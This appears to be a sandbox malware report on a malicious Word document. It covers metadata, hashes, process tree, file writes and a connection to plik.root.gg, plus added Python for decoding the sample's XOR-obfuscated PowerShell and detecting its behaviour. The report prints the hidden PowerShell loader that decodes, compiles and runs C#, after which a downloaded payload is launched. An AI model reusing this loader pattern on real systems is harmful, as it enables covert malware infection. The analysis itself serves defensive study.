File name: | Debtors Review as on 7.18.2019 .doc |
Full analysis: | https://app.any.run/tasks/e6c1265b-355c-4a71-a07e-758a45f80adb |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 13:38:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: o1e44, Subject: p1f21b, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jul 18 08:56:00 2019, Last Saved Time/Date: Thu Jul 18 08:56:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | A5E3811303D8494345734C921B6BC2C9 |
SHA1: | 5C3195F3A9E045DB61531A248477CFF0F0405334 |
SHA256: | 2948787E6709CD5322648262F1E2CB1BB1E4BC921CDCDF81EA759ABA4E552034 |
SSDEEP: | 12288:hDDH2JexyhrAopDEPoqVM22rqxMaA58ewbrH2JexMhrAoTDEPoqC:JbcemAou/zAqOaA58eezcekAos/ |
Extension | File type | Score
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Property | Value
---|---
Title: | o1e44
Subject: | p1f21b
Author: | -
Keywords: | -
Comments: | -
Template: | Normal.dotm
LastModifiedBy: | -
RevisionNumber: | 1
Software: | Microsoft Office Word
TotalEditTime: | -
CreateDate: | 2019:07:18 07:56:00
ModifyDate: | 2019:07:18 07:56:00
Pages: | 1
Words: | -
Characters: | 1
Security: | None
CodePage: | Windows Latin 1 (Western European)
Bytes: | 11000
Lines: | 1
Paragraphs: | 1
CharCountWithSpaces: | 1
AppVersion: | 16
ScaleCrop: | No
LinksUpToDate: | No
SharedDoc: | No
HyperlinksChanged: | No
TitleOfParts: | o1e44
HeadingPairs: | -
CompObjUserTypeLen: | 32
CompObjUserType: | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3164 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Debtors Review as on 7.18.2019 .doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2908 | powershell -WindowStyle Hidden function ac629 { param($ocbef) $a86a42 = 'l4c4a';$bcd45f1 = ''; for ($i = 0; $i -lt $ocbef.length; $i+=2) { $e4da3 = [convert]::ToByte($ocbef.Substring($i, 2), 16); $bcd45f1 += [char]($e4da3 -bxor $a86a42[($i / 2) % $a86a42.length]); } return $bcd45f1; } $qfc42cf = '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'; $qfc42cf2 = ac629($qfc42cf); Add-Type -TypeDefinition $qfc42cf2; [w5bf496]::rf7117(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2180 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
3396 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDE3B.tmp" "c:\Users\admin\AppData\Local\Temp\CSCDE3A.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400)
2140 | "C:\Users\admin\AppData\Roaming\a94afc.exe" | C:\Users\admin\AppData\Roaming\a94afc.exe | — | powershell.exe
User: admin Company: El Matador Integrity Level: MEDIUM Description: snakeGameX Version: 8.0.4.2
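The PowerShell stage in PID 2908 is the part of this tree worth unpacking. WINWORD.EXE (PID 3164) has no child process at all; powershell.exe is instead parented by wmiprvse.exe, which is what a macro gets when it starts a command through WMI (Win32_Process.Create) rather than Shell, so the textbook "Office spawns PowerShell" rule does not fire here. The command line carries a hex string, XORs each byte against the repeating key 'l4c4a', hands the result to Add-Type as C# source (which is why csc.exe and cvtres.exe appear under it and why the xbvjcfny.* compile artifacts land in Temp) and then calls [w5bf496]::rf7117(). The TLS connection to plik.root.gg, a public instance of the open-source Plik file-sharing service, and the later launch of a94afc.exe from AppData\Roaming by the same PowerShell are consistent with that compiled code downloading and running the final payload. The hex blob itself is not reproduced on this page, so the Python below, an added example that is not any.run's code or the sample's, ports the ac629 routine and runs it on a constructed command line whose blob encodes a constructed C# stub; the two regular expressions that locate the key and the blob are assumptions fitted to this variant's layout, not a general extractor.

```python
import re

# XOR key taken from the PowerShell command line on this page ($a86a42 = 'l4c4a')
KEY = "l4c4a"


def xor_hex_decode(hex_blob: str, key: str = KEY) -> str:
    """Port of the ac629 routine: hex pairs -> bytes, byte i XORed with key[i % len(key)].

    PowerShell casts each result with [char], so a byte value maps to the code
    point of the same value; decoding as latin-1 reproduces that exactly.
    """
    data = bytes.fromhex(hex_blob)
    k = key.encode("ascii")
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data)).decode("latin-1")


def xor_hex_encode(plaintext: str, key: str = KEY) -> str:
    """Inverse of xor_hex_decode; used here only to build the constructed input."""
    k = key.encode("ascii")
    raw = plaintext.encode("latin-1")
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(raw)).hex()


# Assumed patterns fitted to this variant's layout: the key is the short quoted
# literal immediately followed by the empty accumulator ($x = 'key';$y = '';),
# and the payload is the long all-hex quoted literal.
KEY_RE = re.compile(r"=\s*'([^']{1,32})';\s*\$\w+\s*=\s*'';")
BLOB_RE = re.compile(r"=\s*'([0-9A-Fa-f]{32,})'")


def decode_command_line(cmdline: str) -> str:
    """Pull key and blob out of a recorded command line and return the C# source."""
    key_m = KEY_RE.search(cmdline)
    blob_m = BLOB_RE.search(cmdline)
    if not key_m or not blob_m:
        raise ValueError("key or hex blob not found in command line")
    return xor_hex_decode(blob_m.group(1), key_m.group(1))


def looks_like_csharp(src: str) -> bool:
    """Cheap sanity check that the decode produced Add-Type style source."""
    return "class" in src and "static" in src


# Constructed stand-in for the removed blob: a harmless stub that reuses the type
# and method names the real command line invokes ([w5bf496]::rf7117()).
SAMPLE_CSHARP = (
    "public class w5bf496 { public static void rf7117() "
    "{ System.Console.WriteLine(\"stub\"); } }"
)
SAMPLE_CMDLINE = (
    "powershell -WindowStyle Hidden function ac629 { param($ocbef) "
    "$a86a42 = 'l4c4a';$bcd45f1 = ''; ... return $bcd45f1; } "
    f"$qfc42cf = '{xor_hex_encode(SAMPLE_CSHARP)}'; "
    "$qfc42cf2 = ac629($qfc42cf); Add-Type -TypeDefinition $qfc42cf2; [w5bf496]::rf7117();"
)

if __name__ == "__main__":
    source = decode_command_line(SAMPLE_CMDLINE)
    print(source)
    print("looks like C#:", looks_like_csharp(source))
```

To use it on the real sample, paste the full recorded command line (with the blob) into decode_command_line; the key is read from the command line rather than hard-coded, so a sibling sample with a different key decodes the same way as long as it keeps the same assignment layout.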
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3164 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD188.tmp.cvr | — | — | —
2908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9BNMX9ENYI0X8EPLPDG5.temp | — | — | —
2908 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.0.cs | — | — | —
2908 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline | — | — | —
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCDE3A.tmp | — | — | —
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.pdb | — | — | —
3396 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESDE3B.tmp | — | — | —
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.dll | — | — | —
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.out | — | — | —
3164 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\133A09CA.emf | — | — | —
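Two things in the process and file tables above are useful for detection. First, the lineage: no Office process ever spawns a script host in this run, so the only parent/child signals are PowerShell under wmiprvse.exe, csc.exe under PowerShell, and an .exe under AppData\Roaming launched by PowerShell. Second, the Add-Type footprint: PowerShell writes <base>.0.cs and <base>.cmdline to Temp with a random 8-character base name before csc.exe writes the .dll, .pdb and .out beside them. Note that a94afc.exe itself does not appear in the file table, so this page carries no hash for the final payload; the launch from AppData\Roaming is the record you have. The Python below is an added example (not any.run's code) that runs both kinds of check over constructed records modelled on the two tables; the record classes and the rule wording are assumptions, not any.run's export format.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class Proc:
    pid: int
    image: str     # full image path as recorded
    cmdline: str
    parent: str    # parent image name


@dataclass
class FileEvent:
    pid: int
    path: str


OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage_alerts(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Parent/child rules over the process list; each hit is (pid, reason)."""
    alerts = []
    for p in procs:
        img = basename(p.image)
        parent = basename(p.parent)
        cmd = p.cmdline.lower()
        # The textbook rule. It never fires on this chain: WINWORD.EXE has no child.
        if parent in OFFICE and img in SCRIPT_HOSTS:
            alerts.append((p.pid, "Office application spawned a script host"))
        # What the chain on this page actually looks like.
        if img == "powershell.exe" and parent == "wmiprvse.exe":
            alerts.append((p.pid, "PowerShell parented by WMI provider host (Win32_Process launch)"))
        if img == "powershell.exe" and "-windowstyle hidden" in cmd and "add-type" in cmd:
            alerts.append((p.pid, "hidden PowerShell compiling C# via Add-Type"))
        if img == "csc.exe" and parent == "powershell.exe":
            alerts.append((p.pid, "C# compiler launched by PowerShell"))
        if parent == "powershell.exe" and img.endswith(".exe") and "\\appdata\\roaming\\" in p.image.lower():
            alerts.append((p.pid, "PowerShell ran a binary dropped under AppData\\Roaming"))
    return alerts


def add_type_compile_artifacts(files: List[FileEvent]) -> List[str]:
    """Temp base names for which one process wrote both <base>.0.cs and <base>.cmdline."""
    seen: Dict[Tuple[int, str], Set[str]] = {}
    for f in files:
        m = re.fullmatch(r"([a-z0-9]{8})\.(0\.cs|cmdline)", basename(f.path))
        if m and "\\temp\\" in f.path.lower():
            seen.setdefault((f.pid, m.group(1)), set()).add(m.group(2))
    return sorted(base for (_pid, base), exts in seen.items() if exts == {"0.cs", "cmdline"})


# Constructed records modelled on the process and file tables above (command
# lines abbreviated; the removed hex blob is not reproduced).
SAMPLE_PROCS = [
    Proc(3164, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Debtors Review as on 7.18.2019 .doc"',
         "explorer.exe"),
    Proc(2908, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -WindowStyle Hidden function ac629 { ... } Add-Type -TypeDefinition $qfc42cf2; [w5bf496]::rf7117();",
         "wmiprvse.exe"),
    Proc(2180, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
         r'csc.exe /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline"',
         "powershell.exe"),
    Proc(3396, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
         "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ...", "csc.exe"),
    Proc(2140, r"C:\Users\admin\AppData\Roaming\a94afc.exe",
         r'"C:\Users\admin\AppData\Roaming\a94afc.exe"', "powershell.exe"),
]
SAMPLE_FILES = [
    FileEvent(3164, r"C:\Users\admin\AppData\Local\Temp\CVRD188.tmp.cvr"),
    FileEvent(2908, r"C:\Users\admin\AppData\Local\Temp\xbvjcfny.0.cs"),
    FileEvent(2908, r"C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline"),
    FileEvent(2180, r"C:\Users\admin\AppData\Local\Temp\xbvjcfny.dll"),
]

if __name__ == "__main__":
    for pid, why in lineage_alerts(SAMPLE_PROCS):
        print(pid, why)
    print("Add-Type compile units:", add_type_compile_artifacts(SAMPLE_FILES))
```

The Office-parent rule is kept deliberately even though it produces nothing here: the point is that the WMI hop moves the PowerShell launch out from under WINWORD.EXE, so coverage has to come from the wmiprvse.exe parent and from the Add-Type artifacts instead.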
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
2908 | powershell.exe | 37.187.19.227:443 | plik.root.gg | OVH SAS | FR | suspicious
Domain | IP | Reputation
---|---|---
plik.root.gg | 37.187.19.227 | suspicious
Process | Message
---|---
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
The originated/propagated pair above is recorded five times in a row. -2147024774 is HRESULT 0x8007007A, HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER), raised inside the side-by-side (SxS) isolation code that csc.exe loads on its own; it says nothing about the sample beyond confirming that the compiler ran.